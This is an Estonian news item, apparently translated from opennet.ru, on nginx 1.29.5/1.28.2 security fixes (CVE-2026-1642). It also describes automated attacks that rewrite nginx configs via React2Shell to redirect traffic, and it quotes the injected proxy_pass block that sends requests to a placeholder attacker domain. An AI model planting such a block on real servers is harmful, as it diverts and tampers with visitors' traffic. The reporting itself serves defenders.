Nginx 1.29.4 koos turvaaugu parandamisega. Rünnakud, mis muudavad nginx seadistusi liikluse suunamiseks.

On välja antud nginx 1.29.5 põhiharude versioon, mille käigus jätkub uute funktsioonide arendamine ning samal ajal on välja antud paralleelselt toetatav stabiilne haru nginx 1.28.2, kuhu kantakse ainult tõsiste vigade ja turvaaukude parandused. Uuendustes on parandatud turvaauk (CVE-2026-1642), mis võimaldab ründajal, kellel on võimalus sekkuda (MITM) suhtluses nginx'i ja upstream-serveri vahel, asendada kliendile saadetavaid vastuseid. Probleem mõjutab seadistusi, mis suunavad päringuid (HTTP 1.x, HTTP/2, gRPC või uWSGI) ülemisele serverile, kasutades TLS-krüptimist.

Lisaks haavatavusele versioonis 1.29.5 on SSL-iga seotud vigade logimise tase «crit» alandatud «info» tasemele ja mitmed probleemid on lahendatud: vabastatud mälu (use-after-free) juurdepääs pärast gRPC või HTTP/2 järgmisele taustale üleminekut; probleem vale HTTP/2 päringu saatmisega pärast üleminekut järgmisele upstream-serverile on lahendatud; parandatud mitme vahemiku vastuse suuruse suurenemine; HTTP_HOST muutujate seadmine on konfigureeritud FastCGI, SCGI ja uwsgi taustadele edasi saatmisel.

Lisaks võib märkida automaatsete rünnakute tuvastamist, mis pärast edukat murdmist serverite piiratult piiravad nginx-i konfiguratsiooni muutmist. Rünnak toimub läbi puutumatute React2Shell haavatavuste serverikomponentides React süsteemides, kus on hõivatud haldustooted., nagu Baota (BT). Nginx-i konfiguratsiooni muudatused suunavad päringud ründaja serverisse, mis asendas vastuses kasutajale kahjulikud muudatused. location /%PATH%/ { set $fullurl "$scheme://$host$request_uri"; rewrite ^/%PATH%/?(.*)$ /index.php?domain=$fullurl&$args break; proxy_set_header Host [Attacker_Domain]; proxy_set_header X-Real-IP $remote_addr; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; proxy_set_header X-Forwarded-Proto $scheme; proxy_set_header User-Agent $http_user_agent; proxy_set_header Referer $http_referer; proxy_ssl_server_name on; proxy_pass http://[Attacker_Domain]; }

Seega, selle asemel, et installida juurkomplekte või pahavara serverisse, on rünnak korraldatud klientide vastu, kes avavad serveris majutatud veebilehte, ilma et serveri veebisaidi komponente otse muudetaks. Rünnak on peamiselt suunatud Aasia riikide domeenide, samuti domeenide *.edu ja *.gov liikluse pealtkuulamisele. Rünnaku käigus suunatakse valikulised päringud ründaja serverist, näiteks sisaldades teede sõnu nagu „pg“, „pgslot“, „slot“, „game“, „casino“, „live“, „help“, „news“, „page“, „blog“, „about“, „support“ ja „info“. Rünnak toimub automatiseeritult tungivahendite abil, mis toimivad nginx konfiguratsiooni otsimise ja analüüsimise, seadete mallide valimise ja sisestamise, nginx'i taaskäivitamise ja muudetud variandi töö kontrollimise kaudu.

Nginx 1.29.4 koos turvaaugu parandamisega. Rünnakud, mis muudavad nginx seadistusi liikluse suunamiseks.


Allikas: opennet.ru
Osta usaldusväärne veebihosting DDoS kaitsega, VPS VDS serverid 🔥 Osta usaldusväärne veebihosting DDoS kaitsega, VPS VDS serverid | ProHoster